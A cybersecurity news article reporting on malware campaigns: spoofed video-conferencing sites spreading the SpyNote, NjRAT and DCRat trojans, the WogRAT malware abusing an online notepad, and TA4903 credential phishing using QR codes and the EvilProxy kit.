Threat actors have been exploiting fake websites advertising popular video conferencing software such as Google Meet, Skype, and Zoom to spread a variety of malware targeting both Android and Windows users since December 2023.
“The threat actor is distributing remote access Trojans (RATs), including SpyNote RAT for Android platforms and NjRAT and DCRat for Windows systems,” Zscaler ThreatLabz researchers said.
The spoofed sites are in Russian and are hosted on domains that closely resemble their legitimate counterparts, indicating that the attackers are using typosquatting tricks to trick potential victims into downloading the malware.
They also come with options to download the app for Android, iOS, and Windows platforms. While clicking the Android button downloads an APK file, clicking the Windows app button triggers the download of a batch script.
The malicious batch script is responsible for executing a PowerShell script which, in turn, downloads and executes the remote access trojan.
There is currently no evidence that the threat actor is targeting iOS users, as clicking the iOS app button takes the user to the legitimate Apple App Store listing for Skype.
“A threat actor is using these decoys to deploy RATs for Android and Windows, which can steal sensitive information, log keystrokes, and steal files,” the researchers said.
The development comes as the AhnLab Security Intelligence Center (ASEC) revealed that a new malware called WogRAT that targets both Windows and Linux is abusing a free online notepad platform called aNotepad as a hidden vector to host and retrieve malicious code .
It is said to be active from at least the end of 2022, targeting Asian countries such as China, Hong Kong, Japan and Singapore, among others. That said, it is currently unknown how the malware is distributed in the wild.
“When WogRAT runs for the first time, it collects basic information of the infected system and sends it to the C&C server,” ASEC said. “The malware then supports commands such as executing commands, sending results, downloading files and uploading these files.”
It also coincides with high-volume phishing campaigns orchestrated by a financially motivated cybercriminal known as TA4903 to steal corporate credentials and possibly follow them with Business Email Compromise (BEC) attacks. The adversary has been active since at least 2019, with activity expected to intensify after mid-2023.
“TA4903 regularly conducts spoofing campaigns of various US government entities to steal corporate credentials,” Proofpoint said. “The actor also spoofs organizations in various industries including construction, finance, healthcare, food and beverage, and others.”
Attack chains involve using QR codes (also known as quishing) to phish credentials and relying on the EvilProxy Adversary-in-the-Middle (AiTM) phishing kit to bypass two-way authentication protections factors (2FA).
Once the targeted inbox was compromised, the threat actor was observed searching for relevant information on payments, invoices, and banking information, with the ultimate goal of hijacking existing email threads and performing invoice fraud .
Phishing campaigns have also served as a conduit for other malware families such as DarkGate, Agent Tesla, and Remcos RAT, the last of which leverages steganographic decoys to release the malware onto compromised hosts.